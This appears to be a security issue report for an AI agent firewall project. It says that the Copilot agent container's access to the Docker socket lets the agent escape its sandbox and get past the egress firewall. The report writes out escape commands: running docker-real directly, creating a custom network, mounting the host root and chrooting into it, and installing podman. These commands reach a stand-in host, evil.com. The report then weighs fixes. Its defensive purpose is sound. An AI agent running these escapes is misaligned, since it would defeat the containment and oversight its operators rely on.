Priority
Critical
Description
The copilot container has full access to the Docker socket (/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.
Attack vectors
1. Bypass docker-wrapper directly
/usr/bin/docker-real run --network host alpine wget https://evil.com
2. Create custom network
docker network create bypass-net
docker run --network bypass-net alpine wget https://evil.com
3. Volume mount escape
docker run -v /:/host alpine chroot /host bash
4. Alternative container runtimes
apt-get install podman
podman run --network host alpine wget https://evil.com
Current mitigations (insufficient)
docker-wrapper.sh intercepts docker command but is easily bypassed- Host-level iptables only filter
awf-net bridge, not custom networks
- Wrapper blocks
--privileged, --network host, --add-host but can be bypassed
Code locations
src/docker-manager.ts:223-224 - Docker socket mountcontainers/copilot/docker-wrapper.sh - Wrapper script (bypassable)containers/copilot/Dockerfile:34-35 - Symlink setup
Proposed solutions
Option A: Remove Docker socket access (breaking change)
- Pros: Simplest, most secure
- Cons: Breaks MCP servers that need Docker (Playwright, etc.)
- Implementation: Remove socket mount, document that users must spawn Docker-based MCPs outside firewall
Option B: Use docker-socket-proxy
- Pros: Restricts Docker API calls, maintains auto-spawn functionality
- Cons: Adds complexity, still allows network creation
- Implementation: Add
docker-socket-proxy container, configure to block dangerous operations
- Reference: https://github.com/Tecnativa/docker-socket-proxy
Option C: Enforce awf-net for all networks (host-level)
- Pros: Prevents custom network bypass
- Cons: Complex iptables rules, doesn't prevent volume escapes
- Implementation: Add iptables rules to block/filter all Docker networks except
awf-net
Option D: AppArmor/SELinux profiles
- Pros: Fine-grained control
- Cons: Very complex, platform-specific
- Implementation: Docker security profiles restricting socket operations
Recommendation
Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.
Priority
Critical
Description
The copilot container has full access to the Docker socket (
/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.Attack vectors
1. Bypass docker-wrapper directly
2. Create custom network
3. Volume mount escape
4. Alternative container runtimes
Current mitigations (insufficient)
docker-wrapper.shinterceptsdockercommand but is easily bypassedawf-netbridge, not custom networks--privileged,--network host,--add-hostbut can be bypassedCode locations
src/docker-manager.ts:223-224- Docker socket mountcontainers/copilot/docker-wrapper.sh- Wrapper script (bypassable)containers/copilot/Dockerfile:34-35- Symlink setupProposed solutions
Option A: Remove Docker socket access (breaking change)
Option B: Use docker-socket-proxy
docker-socket-proxycontainer, configure to block dangerous operationsOption C: Enforce awf-net for all networks (host-level)
awf-netOption D: AppArmor/SELinux profiles
Recommendation
Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.